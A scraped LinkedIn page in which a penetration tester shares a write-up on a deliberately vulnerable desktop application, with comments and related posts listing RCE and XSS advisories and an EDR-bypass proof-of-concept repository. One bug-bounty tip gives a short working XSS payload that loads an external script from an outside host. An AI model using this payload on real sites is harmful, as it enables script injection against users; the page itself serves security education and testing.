Akanksha Prasad
Security Consultant | Penetration Tester
- Report this post
Hey there, fellow readers and knowledge seekers! I have documented my findings while pentesting a vulnerable desktop application, go through the below writeup for details. https://lnkd.in/duSZmf-c"Terrible Thick Client" is a vulnerable standalone desktop application developed in C# .NET framework by Kartik Durg https://lnkd.in/dk6Y7ch4Thanks to Prajyot and Akshay for the assistance!π #thickclient #desktopapp #pentesting #owasptop10
531
7 Comments
Kuldeep V.
Assistant Technical Delivery Manager @NetSentries | OSCP | CRTP
11mo
- Report this comment
Karan Verma Varsh*t Modi Jain
2Reactions 3Reactions
Mouhssine Kassih
Penetration Tester | Bug Hunter | OSCP | CRTP
11mo
- Report this comment
Amine Amhoume
1Reaction 2Reactions
Kartik Durg
Gamified Cyber ππ¦π€πΆπ³πͺπ΅y | ππππ | ππππ
11mo
- Report this comment
Hope you guys enjoyed it!
3Reactions 4Reactions
Shean Y.
I am just a Infosec advocate and learner
11mo
- Report this comment
Thanks for sharing, Soumyadeep Basu & Akanksha Prasad.
1Reaction 2Reactions
Spencer Alessi
Hacker | Pentester | Active Directory Security Connoisseur | Content Creator | Ethical Threat
11mo
- Report this comment
What a great idea!
1Reaction 2Reactions
Anivedh Auradkar
Cyber Security Engineer | Detection Engineering | Threat Hunter | Security Operations | Pentester | Platform Operations | LogRhythm Platform Administrator
11mo
- Report this comment
good one! Akanksha Prasad
1Reaction 2Reactions
To view or add a comment, sign in
More Relevant Posts
-
Securely Managed
98 followers
- Report this post
Zero-day exploit sound scary? This type of attack exploits a software vulnerability that is unknown - developers have zero days to fix the issue or provide a patch, leaving users vulnerable until a solution is implemented!#quiztime #polloftheweek #vulnerabilityexploit #softwarevulnerability #cyberattackers #zeroday
Like CommentTo view or add a comment, sign in
-
CyberCureME - Cyber Security Marketplace
8,048 followers
- Report this post
liveSite 2019.1 Remote Code Execution β Packet Storm packetstormsecurity.comliveSite 2019.1 Remote Code Execution: liveSite version 2019.1 suffers from a remote code execution vulnerability.
Like CommentTo view or add a comment, sign in
-
Anton K
Software Engineering
- Report this post
We don't have to release new code on every commit.But we should have the ability to do so safely.Not because people want new code all the time (OK, they might if there's a fire).However, having the ability to release *safely* at any time is a seal of quality.It's a feather in the cap that shows that we've really done our due dilligence when it comes to bug prevention, fault-tolerance, and incident recovery.It shows that we're serious about quality.That's worth striving for.#softwareengineering
48
1 Comment
Like CommentTo view or add a comment, sign in
-
Marcus Webster
Recruiting IoT/IIoT, Security, Embedded, Network/Device, Cybersecurity, Automotive, ICS/SCADA, Mobile, Cloud, HPC/Supercomputing Talent
- Report this post
#ApplicationSecurity #Vulnerabilities A cross-site scripting vulnerability in the WP-Members Membership plugin could allow attackers to inject scripts into user profile pages.The post Security Flaw in WP-Members Plugin Leads to Script Injection appeared first on SecurityWeek. https://lnkd.in/g2HuMu3S
Like CommentTo view or add a comment, sign in
-
vignesh Chandrasekaran
information Security enthusiast with expertise for various areas of infosec
- Report this post
GitHub - S3cur3Th1ssh*t/Ruy-Lopez github.comRuy-LopezThis repository contains the Proof-of-Concept(PoC) for a new approach to completely prevent DLLs from being loaded into a newly spawned process.The initial use-case idea was to block AV/EDR vendor DLLs from being loaded, so that userland hooking based detections are bypassed.https://lnkd.in/gTv39m2V#infosec#pentesting#redteam #AVbypass
3
Like CommentTo view or add a comment, sign in
-
CyberCureME - Cyber Security Marketplace
8,048 followers
- Report this post
E-Insurance 1.0 Cross Site Scripting β Packet Storm packetstormsecurity.comE-Insurance 1.0 Cross Site Scripting: E-Insurance version 1.0 suffers from a persistent cross site scripting vulnerability.
Like CommentTo view or add a comment, sign in
-
Hany Soliman
Muslim | Sr. Cyber Security Engineer , CRTE | ISO 27k LA | APISEC | OAPT | OBBH2.0 | CEH | DevSecOps | VAPT
- Report this post
One-Liner-CollectionsThis Repositories contains list of One Liners with Descriptions and Installation requirements.https://lnkd.in/dngvRPjP#infosec #pentesting #bugbounty
Like CommentTo view or add a comment, sign in
-
Cristian Zot
-
- Report this post
AG Grid is one of the more expensive licenses you can find while doing a secure code review. Look for `setLicenseKey`.#pentesting #appsec #bugbountytips
7
Like CommentTo view or add a comment, sign in
-
CyberCureME - Cyber Security Marketplace
8,048 followers
- Report this post
Perch 3.2 Remote Code Execution β Packet Storm packetstormsecurity.comPerch 3.2 Remote Code Execution: Perch version 3.2 suffers from a remote code execution vulnerability.
Like CommentTo view or add a comment, sign in
-
Anton (therceman)
Co-Founder | Ethical Hacking Expert | Sharing Bug Bounty Knowledge
- Report this post
Bug Bounty HintYou can demonstrate the preload and execution of an external script on your target using this XSS payload:with(document)body.appendChild(createElement('script')).src='//6a.lv'This payload is only 69 characters long.JS code: alert(document.domain)Cheers!#xss #bugbounty #bugbountytips
99
4 Comments
Like CommentTo view or add a comment, sign in
3,962 followers
- 12 Posts
View Profile
Follow